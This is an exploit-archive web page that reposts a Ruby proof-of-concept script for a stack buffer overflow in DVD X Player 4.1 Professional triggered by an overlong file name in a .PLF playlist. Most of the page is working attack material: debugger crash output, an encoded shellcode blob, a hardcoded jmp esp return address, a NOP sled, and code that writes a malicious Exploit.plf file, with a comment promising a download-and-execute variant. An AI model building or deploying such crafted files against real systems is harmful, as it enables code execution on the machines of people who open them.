首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit 来源：www.vfocus.net 作者：Str0ke 发布时间：2007-06-04   #!/usr/bin/env ruby #################################################################################################### #0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b. #First of all DVD x is prone to a buffer-overflow when playing an overly long file name inside #A .plf file Which is  InterVideo WinDVD Play list File but also Dvd x uses this file as a play #list file.Also the seh handlers got smashed so seh over-write is possible.Upon successful #Exploitation calc will open and if it don't make sure you have the right jmp esp% #Tested on :win xp service pack 2 #Vendors web site: http://www.dvd-x-player.com/ #Esp was pointing 277 byte's in to the buffer. #And eip was over written 261 byte's in  to the buffer .So i made the 17 byte's up with nop's sled. #I will be writing a c version as it will be nice to have download execute shell code as the program #Doesn't shut down but runs in the back ground #################################################################################################### #                                                      \\Debug info// #(65c.98c): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000001 ebx=77f6cf47 ecx=04450e60 edx=00000042 esi=04450348 edi=6405341c #eip=41414141 esp=0012f4ac ebp=01adfe50 iopl=0         nv up ei pl nz na po nc #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202 #41414141 ??              ??? #0:000> g #(65c.98c): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000 #eip=41414141 esp=0012f0dc ebp=0012f0fc iopl=0         nv up ei pl zr na pe nc #cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 #41414141 ??              ??? ###################################################################################  #Shouts:  - Str0ke - Marsu  - SM - Aelphaeis - vade79 - c0ntex ~ Kevin Finisterre ################################################################################### #Credit goes to n00b for writing exploit and finding bug. !!! < Enjoy >. ###################################################################################   Header1 = "\x63\x3A\x5c"  # C:\ bof =   'A'* 257    #Fill our bufer with sh!t. shell = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ #351 bytes "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ "\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"+ "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"+ "\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"+ "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"+ "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"+ "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"+ "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"+ "\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"+ "\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"+ "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"+ "\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"+ "\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"+ "\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"+ "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"+ "\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a" ret = "\x27\xB1\xFA\x77"  # 4bytes // Jmp esp% in shlwapi.dll nop = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" # Ffs my nop sled 16byte's bof2 ='B'* 388  # fill the rest of the file up with sh!t. Header2 = "\x2E\x6D\x70\x33" #  .mp3 n00b = Header1 + bof + ret + nop + shell + bof2 + Header2  # Build the file. File.open( "Exploit.plf","w") do |the_file|  # Open the file for writing  the_file.puts (n00b)  # Place data from variable. the_file.close  # Close end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·IE6 / Provideo Camimage (ISSCa ·IBM Tivoli Provisioning Manage ·Microsoft IIS <= 5.1 Hit Highl ·Sendcard <= 3.4.1 (Local File ·Pheap 2.0 Admin Bypass / Remot ·EQdkp <= 1.3.2 (listmembers.ph ·Inout Search Engine (all versi ·HP Tru64 Remote Secure Shell U ·SNMPc <= 7.0.18 Remote Denial ·Apache 2.0.58 mod_rewrite Remo ·Joomla Component Phil-a-Form < ·PBLang <= 4.67.16.a Remote Cod   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved